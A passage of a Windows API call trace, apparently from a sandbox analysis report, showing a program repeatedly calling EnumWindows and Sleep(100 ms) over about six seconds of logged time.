EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.725] Sleep (dwMilliseconds=0x64) [0200.732] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.732] Sleep (dwMilliseconds=0x64) [0200.737] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.737] Sleep (dwMilliseconds=0x64) [0200.740] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.740] Sleep (dwMilliseconds=0x64) [0200.744] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.745] Sleep (dwMilliseconds=0x64) [0200.747] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.747] Sleep (dwMilliseconds=0x64) [0200.750] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.750] Sleep (dwMilliseconds=0x64) [0200.753] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.753] Sleep (dwMilliseconds=0x64) [0200.763] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.763] Sleep (dwMilliseconds=0x64) [0200.770] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.770] Sleep (dwMilliseconds=0x64) [0200.772] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.772] Sleep (dwMilliseconds=0x64) [0200.774] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.775] Sleep (dwMilliseconds=0x64) [0200.777] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.777] Sleep (dwMilliseconds=0x64) [0200.783] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.783] Sleep (dwMilliseconds=0x64) [0200.786] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.786] Sleep (dwMilliseconds=0x64) [0200.789] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.790] Sleep (dwMilliseconds=0x64) [0200.792] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.792] Sleep (dwMilliseconds=0x64) [0200.794] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.794] Sleep (dwMilliseconds=0x64) [0200.810] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.810] Sleep (dwMilliseconds=0x64) [0200.838] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.838] Sleep (dwMilliseconds=0x64) [0200.914] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0200.915] Sleep (dwMilliseconds=0x64) [0201.013] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.013] Sleep (dwMilliseconds=0x64) [0201.114] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.114] Sleep (dwMilliseconds=0x64) [0201.155] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.156] Sleep (dwMilliseconds=0x64) [0201.192] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.193] Sleep (dwMilliseconds=0x64) [0201.234] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.234] Sleep (dwMilliseconds=0x64) [0201.269] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.270] Sleep (dwMilliseconds=0x64) [0201.278] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.279] Sleep (dwMilliseconds=0x64) [0201.285] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.286] Sleep (dwMilliseconds=0x64) [0201.291] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.291] Sleep (dwMilliseconds=0x64) [0201.294] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.294] Sleep (dwMilliseconds=0x64) [0201.297] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.297] Sleep (dwMilliseconds=0x64) [0201.301] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.301] Sleep (dwMilliseconds=0x64) [0201.310] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.311] Sleep (dwMilliseconds=0x64) [0201.315] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.315] Sleep (dwMilliseconds=0x64) [0201.321] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.321] Sleep (dwMilliseconds=0x64) [0201.324] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.324] Sleep (dwMilliseconds=0x64) [0201.327] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.327] Sleep (dwMilliseconds=0x64) [0201.330] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.330] Sleep (dwMilliseconds=0x64) [0201.332] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.333] Sleep (dwMilliseconds=0x64) [0201.335] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.335] Sleep (dwMilliseconds=0x64) [0201.337] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.338] Sleep (dwMilliseconds=0x64) [0201.357] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.359] Sleep (dwMilliseconds=0x64) [0201.388] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.389] Sleep (dwMilliseconds=0x64) [0201.462] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.462] Sleep (dwMilliseconds=0x64) [0201.626] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.627] Sleep (dwMilliseconds=0x64) [0201.673] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.675] Sleep (dwMilliseconds=0x64) [0201.721] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.721] Sleep (dwMilliseconds=0x64) [0201.763] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.763] Sleep (dwMilliseconds=0x64) [0201.804] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.804] Sleep (dwMilliseconds=0x64) [0201.843] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.843] Sleep (dwMilliseconds=0x64) [0201.863] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.863] Sleep (dwMilliseconds=0x64) [0201.874] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.874] Sleep (dwMilliseconds=0x64) [0201.878] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.878] Sleep (dwMilliseconds=0x64) [0201.884] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.884] Sleep (dwMilliseconds=0x64) [0201.887] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.888] Sleep (dwMilliseconds=0x64) [0201.891] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.891] Sleep (dwMilliseconds=0x64) [0201.897] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.898] Sleep (dwMilliseconds=0x64) [0201.902] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.902] Sleep (dwMilliseconds=0x64) [0201.905] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.906] Sleep (dwMilliseconds=0x64) [0201.911] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.911] Sleep (dwMilliseconds=0x64) [0201.914] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.914] Sleep (dwMilliseconds=0x64) [0201.918] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.918] Sleep (dwMilliseconds=0x64) [0201.925] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.925] Sleep (dwMilliseconds=0x64) [0201.928] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.928] Sleep (dwMilliseconds=0x64) [0201.932] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.932] Sleep (dwMilliseconds=0x64) [0201.937] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.938] Sleep (dwMilliseconds=0x64) [0201.940] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.941] Sleep (dwMilliseconds=0x64) [0201.944] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.944] Sleep (dwMilliseconds=0x64) [0201.947] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.947] Sleep (dwMilliseconds=0x64) [0201.952] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.952] Sleep (dwMilliseconds=0x64) [0201.961] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0201.962] Sleep (dwMilliseconds=0x64) [0202.017] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.017] Sleep (dwMilliseconds=0x64) [0202.122] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.122] Sleep (dwMilliseconds=0x64) [0202.201] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.201] Sleep (dwMilliseconds=0x64) [0202.296] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.297] Sleep (dwMilliseconds=0x64) [0202.382] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.383] Sleep (dwMilliseconds=0x64) [0202.423] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.424] Sleep (dwMilliseconds=0x64) [0202.464] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.465] Sleep (dwMilliseconds=0x64) [0202.528] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.528] Sleep (dwMilliseconds=0x64) [0202.533] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.533] Sleep (dwMilliseconds=0x64) [0202.538] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.538] Sleep (dwMilliseconds=0x64) [0202.547] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.548] Sleep (dwMilliseconds=0x64) [0202.552] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.552] Sleep (dwMilliseconds=0x64) [0202.555] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.555] Sleep (dwMilliseconds=0x64) [0202.562] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.562] Sleep (dwMilliseconds=0x64) [0202.564] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.564] Sleep (dwMilliseconds=0x64) [0202.569] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.569] Sleep (dwMilliseconds=0x64) [0202.575] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.576] Sleep (dwMilliseconds=0x64) [0202.580] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.580] Sleep (dwMilliseconds=0x64) [0202.584] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.585] Sleep (dwMilliseconds=0x64) [0202.591] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.591] Sleep (dwMilliseconds=0x64) [0202.594] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.595] Sleep (dwMilliseconds=0x64) [0202.599] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.600] Sleep (dwMilliseconds=0x64) [0202.606] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.606] Sleep (dwMilliseconds=0x64) [0202.611] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.611] Sleep (dwMilliseconds=0x64) [0202.613] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.613] Sleep (dwMilliseconds=0x64) [0202.617] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.618] Sleep (dwMilliseconds=0x64) [0202.621] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.621] Sleep (dwMilliseconds=0x64) [0202.624] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.624] Sleep (dwMilliseconds=0x64) [0202.626] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.627] Sleep (dwMilliseconds=0x64) [0202.668] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.668] Sleep (dwMilliseconds=0x64) [0202.725] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.726] Sleep (dwMilliseconds=0x64) [0202.791] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.792] Sleep (dwMilliseconds=0x64) [0202.868] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.869] Sleep (dwMilliseconds=0x64) [0202.954] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.955] Sleep (dwMilliseconds=0x64) [0202.994] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0202.995] Sleep (dwMilliseconds=0x64) [0203.033] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.033] Sleep (dwMilliseconds=0x64) [0203.035] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.036] Sleep (dwMilliseconds=0x64) [0203.046] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.047] Sleep (dwMilliseconds=0x64) [0203.052] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.053] Sleep (dwMilliseconds=0x64) [0203.071] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.071] Sleep (dwMilliseconds=0x64) [0203.075] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.076] Sleep (dwMilliseconds=0x64) [0203.080] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.080] Sleep (dwMilliseconds=0x64) [0203.082] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.082] Sleep (dwMilliseconds=0x64) [0203.086] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.087] Sleep (dwMilliseconds=0x64) [0203.091] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.091] Sleep (dwMilliseconds=0x64) [0203.094] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.094] Sleep (dwMilliseconds=0x64) [0203.097] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.098] Sleep (dwMilliseconds=0x64) [0203.101] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.101] Sleep (dwMilliseconds=0x64) [0203.107] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.107] Sleep (dwMilliseconds=0x64) [0203.111] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.111] Sleep (dwMilliseconds=0x64) [0203.117] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.118] Sleep (dwMilliseconds=0x64) [0203.120] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.120] Sleep (dwMilliseconds=0x64) [0203.123] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.127] Sleep (dwMilliseconds=0x64) [0203.135] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.135] Sleep (dwMilliseconds=0x64) [0203.185] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.186] Sleep (dwMilliseconds=0x64) [0203.253] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.254] Sleep (dwMilliseconds=0x64) [0203.327] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.327] Sleep (dwMilliseconds=0x64) [0203.436] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.436] Sleep (dwMilliseconds=0x64) [0203.512] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.512] Sleep (dwMilliseconds=0x64) [0203.651] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.652] Sleep (dwMilliseconds=0x64) [0203.700] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.700] Sleep (dwMilliseconds=0x64) [0203.727] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.728] Sleep (dwMilliseconds=0x64) [0203.738] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.738] Sleep (dwMilliseconds=0x64) [0203.741] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.742] Sleep (dwMilliseconds=0x64) [0203.748] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.748] Sleep (dwMilliseconds=0x64) [0203.752] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.753] Sleep (dwMilliseconds=0x64) [0203.773] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.773] Sleep (dwMilliseconds=0x64) [0203.776] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.776] Sleep (dwMilliseconds=0x64) [0203.781] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.781] Sleep (dwMilliseconds=0x64) [0203.784] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.785] Sleep (dwMilliseconds=0x64) [0203.790] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.790] Sleep (dwMilliseconds=0x64) [0203.793] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.794] Sleep (dwMilliseconds=0x64) [0203.798] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.798] Sleep (dwMilliseconds=0x64) [0203.801] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.801] Sleep (dwMilliseconds=0x64) [0203.805] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.805] Sleep (dwMilliseconds=0x64) [0203.810] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.810] Sleep (dwMilliseconds=0x64) [0203.836] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.836] Sleep (dwMilliseconds=0x64) [0203.904] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.904] Sleep (dwMilliseconds=0x64) [0203.982] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0203.983] Sleep (dwMilliseconds=0x64) [0204.138] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.138] Sleep (dwMilliseconds=0x64) [0204.232] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.232] Sleep (dwMilliseconds=0x64) [0204.276] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.276] Sleep (dwMilliseconds=0x64) [0204.316] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.317] Sleep (dwMilliseconds=0x64) [0204.354] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.355] Sleep (dwMilliseconds=0x64) [0204.394] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.394] Sleep (dwMilliseconds=0x64) [0204.418] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.419] Sleep (dwMilliseconds=0x64) [0204.428] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.428] Sleep (dwMilliseconds=0x64) [0204.433] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.433] Sleep (dwMilliseconds=0x64) [0204.435] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.440] Sleep (dwMilliseconds=0x64) [0204.443] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.443] Sleep (dwMilliseconds=0x64) [0204.448] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.448] Sleep (dwMilliseconds=0x64) [0204.451] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.451] Sleep (dwMilliseconds=0x64) [0204.456] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.456] Sleep (dwMilliseconds=0x64) [0204.458] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.458] Sleep (dwMilliseconds=0x64) [0204.461] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.461] Sleep (dwMilliseconds=0x64) [0204.463] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.463] Sleep (dwMilliseconds=0x64) [0204.466] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.469] Sleep (dwMilliseconds=0x64) [0204.480] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.480] Sleep (dwMilliseconds=0x64) [0204.484] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.484] Sleep (dwMilliseconds=0x64) [0204.488] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.488] Sleep (dwMilliseconds=0x64) [0204.491] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.491] Sleep (dwMilliseconds=0x64) [0204.507] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.508] Sleep (dwMilliseconds=0x64) [0204.534] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.534] Sleep (dwMilliseconds=0x64) [0204.614] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.615] Sleep (dwMilliseconds=0x64) [0204.714] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.714] Sleep (dwMilliseconds=0x64) [0204.865] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.865] Sleep (dwMilliseconds=0x64) [0204.926] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0204.927] Sleep (dwMilliseconds=0x64) [0205.034] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.034] Sleep (dwMilliseconds=0x64) [0205.119] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.119] Sleep (dwMilliseconds=0x64) [0205.161] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.161] Sleep (dwMilliseconds=0x64) [0205.181] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.182] Sleep (dwMilliseconds=0x64) [0205.186] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.186] Sleep (dwMilliseconds=0x64) [0205.190] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.190] Sleep (dwMilliseconds=0x64) [0205.192] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.192] Sleep (dwMilliseconds=0x64) [0205.196] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.196] Sleep (dwMilliseconds=0x64) [0205.199] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.199] Sleep (dwMilliseconds=0x64) [0205.202] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.202] Sleep (dwMilliseconds=0x64) [0205.230] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.231] Sleep (dwMilliseconds=0x64) [0205.260] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.260] Sleep (dwMilliseconds=0x64) [0205.298] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.298] Sleep (dwMilliseconds=0x64) [0205.410] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.410] Sleep (dwMilliseconds=0x64) [0205.492] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.493] Sleep (dwMilliseconds=0x64) [0205.534] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.534] Sleep (dwMilliseconds=0x64) [0205.581] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.582] Sleep (dwMilliseconds=0x64) [0205.669] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.670] Sleep (dwMilliseconds=0x64) [0205.708] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.708] Sleep (dwMilliseconds=0x64) [0205.749] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.749] Sleep (dwMilliseconds=0x64) [0205.764] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.765] Sleep (dwMilliseconds=0x64) [0205.767] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.768] Sleep (dwMilliseconds=0x64) [0205.771] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.772] Sleep (dwMilliseconds=0x64) [0205.774] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.774] Sleep (dwMilliseconds=0x64) [0205.777] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.777] Sleep (dwMilliseconds=0x64) [0205.781] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.782] Sleep (dwMilliseconds=0x64) [0205.786] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.787] Sleep (dwMilliseconds=0x64) [0205.790] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.790] Sleep (dwMilliseconds=0x64) [0205.807] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.807] Sleep (dwMilliseconds=0x64) [0205.831] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.831] Sleep (dwMilliseconds=0x64) [0205.861] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.862] Sleep (dwMilliseconds=0x64) [0205.977] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0205.977] Sleep (dwMilliseconds=0x64) [0206.121] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.121] Sleep (dwMilliseconds=0x64) [0206.189] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.189] Sleep (dwMilliseconds=0x64) [0206.229] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.229] Sleep (dwMilliseconds=0x64) [0206.270] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.271] Sleep (dwMilliseconds=0x64) [0206.314] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.314] Sleep (dwMilliseconds=0x64) [0206.350] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.351] Sleep (dwMilliseconds=0x64) [0206.399] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.400] Sleep (dwMilliseconds=0x64) [0206.411] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.411] Sleep (dwMilliseconds=0x64) [0206.421] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.421] Sleep (dwMilliseconds=0x64) [0206.426] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.427] Sleep (dwMilliseconds=0x64) [0206.429] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.430] Sleep (dwMilliseconds=0x64) [0206.440] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.440] Sleep (dwMilliseconds=0x64) [0206.444] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.447] Sleep (dwMilliseconds=0x64) [0206.456] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.456] Sleep (dwMilliseconds=0x64) [0206.473] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.474] Sleep (dwMilliseconds=0x64) [0206.480] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.480] Sleep (dwMilliseconds=0x64) [0206.482] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.483] Sleep (dwMilliseconds=0x64) [0206.497] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.498] Sleep (dwMilliseconds=0x64) [0206.502] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.502] Sleep (dwMilliseconds=0x64) [0206.544] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.545] Sleep (dwMilliseconds=0x64) [0206.588] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.588] Sleep (dwMilliseconds=0x64) [0206.626] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.627] Sleep (dwMilliseconds=0x64) [0206.665] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.665] Sleep (dwMilliseconds=0x64) [0206.703] EnumWindows 